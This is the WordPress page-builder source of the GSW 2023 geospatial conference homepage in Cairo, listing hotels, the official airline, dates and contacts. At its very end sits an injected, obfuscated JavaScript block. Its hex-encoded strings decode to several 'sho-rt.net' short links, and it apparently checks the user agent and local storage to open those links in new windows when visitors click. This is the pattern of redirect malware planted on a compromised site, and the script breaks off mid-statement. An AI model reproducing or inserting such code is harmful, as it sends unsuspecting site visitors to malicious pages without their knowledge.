width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"200\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 